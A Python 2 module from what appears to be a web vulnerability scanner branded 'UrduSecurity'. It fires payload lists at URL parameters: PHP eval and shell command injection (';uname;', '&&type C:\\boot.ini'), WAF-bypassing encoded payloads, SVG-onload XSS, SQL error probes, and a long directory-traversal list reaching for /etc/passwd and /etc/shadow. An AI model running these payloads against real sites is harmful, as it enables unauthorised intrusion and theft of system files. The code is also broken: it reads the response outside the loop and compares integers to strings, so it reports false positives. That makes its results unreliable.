Modules.py

#!/usr/bin/env python

import re, urllib, time, requests, os, sys, urllib, urllib2, socket
from urllib import FancyURLopener
from designer import *

def Pentest(url, payloads, vuln):
	opener = urllib.urlopen(url)
	vulnerabilities = 0
	if opener.code == '999':
		print COLOR.green + "WebKnight WAF" + COLOR.die + "Detected."
		time.sleep(3)
	for params in url.split("?")[1].split("&"):
		for payload in payloads:
			bugs = url.replace(params, params+str(payload).strip())
			request = useragent.open(bugs)
	html = request.readlines()
	for line in html:
		checker = re.findall(vuln, line)
		if len(checker) != '0':
			print "[+] Payload: " + COLOR.green + "{0}".format(payload) + COLOR.die
			print "[+] Proof of Concept: " + COLOR.green + "{0}".format(bugs) + COLOR.die
			vulnerabilities += 1
	if vulnerabilities == '0':
		 print "[+] Every Payload is Being Properly Escapaed."
	else:
		print "\n[-] Target is Vulnerable to: " + COLOR.green + "{0}".format(vulnerabilities) + COLOR.die + " :Vulnerabilities."
		
def RemoteCodeExecution(url):
	print COLOR.green + "+++" * 16 + COLOR.die 
	print COLOR.green + "-- Checking Remote Code Execution --" + COLOR.die
	print COLOR.green + "+++" * 16 + COLOR.die
	payloads = [';${@print(md5(UrduSecurity))}', ';${@print(md5("UrduSecurity"))}']
	# Encrypted Payloads to Bypass Some WAFs
	payloads += ['%253B%2524%257B%2540print%2528md5%2528%2522UrduSecurity%2522%2529%2529%257D%253B']
	payloads += [';uname;', '&&dir', '&&type C:\\boot.ini', ';phpinfo();', ';phpinfo']
	vuln = re.compile("51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot", re.I)
	Pentest(url, payloads, vuln)
	
def XssTest(url):
	print COLOR.green + "+++" * 16 + COLOR.die
	print COLOR.green + "-- Checking Cross Site Scripting --" + COLOR.die
	print COLOR.green + "+++" * 16 + COLOR.die
	payloads = ['%27%3EUrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb', '%78%22%78%3e%78']
	payloads += ['%22%3EUrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb', 'UrduSecurity%3Csvg%2Fonload%3Dconfirm%28%2FUrduSecurity%2F%29%3Eweb']
	vuln = re.compile('UrduSecurity<svg|x>x', re.I)
	Pentest(url, payloads, vuln)
	
def ErrBsdSQLi(url):
	print COLOR.green + "+++" * 16 + COLOR.die
	print COLOR.green + "-- Checking Error Based SQLi --" + COLOR.die
	print COLOR.green + "+++" * 16 + COLOR.die
	payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
	vuln = re.compile("You have an error in your SQL|Incorrect syntax|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
	Pentest(url, payloads, vuln)

def dirTrans(url):
	print COLOR.green + "+++" * 16 + COLOR.die
	print COLOR.green + "-- Checking For Directory Traversal --" + COLOR.die
	print COLOR.green + "+++" * 16 + COLOR.die
	payloads = ['/etc/master.passwd',
				'/master.passwd',
				'etc/passwd',
				'etc/shadow%00',
				'/etc/passwd',
				'/etc/passwd%00',
				'../etc/passwd',
				'../etc/passwd%00',
				'../../etc/passwd',
				'../../etc/passwd%00',
				'../../../etc/passwd',
				'../../../etc/passwd%00',
				'../../../../etc/passwd',
				'../../../../etc/passwd%00',
				'../../../../../etc/passwd',
				'../../../../../etc/passwd%00',
				'../../../../../../etc/passwd',
				'../../../../../../etc/passwd%00',
				'../../../../../../../etc/passwd',
				'../../../../../../../etc/passwd%00',
				'../../../../../../../../etc/passwd',
				'../../../../../../../../etc/passwd%00',
				'../../../../../../../../../etc/passwd',
				'../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../../../../../etc/passwd',
				'../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00',
				'../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00',
				]
	vuln = re.compile('root.*bash$', re.I)
	Pentest(url, payloads, vuln)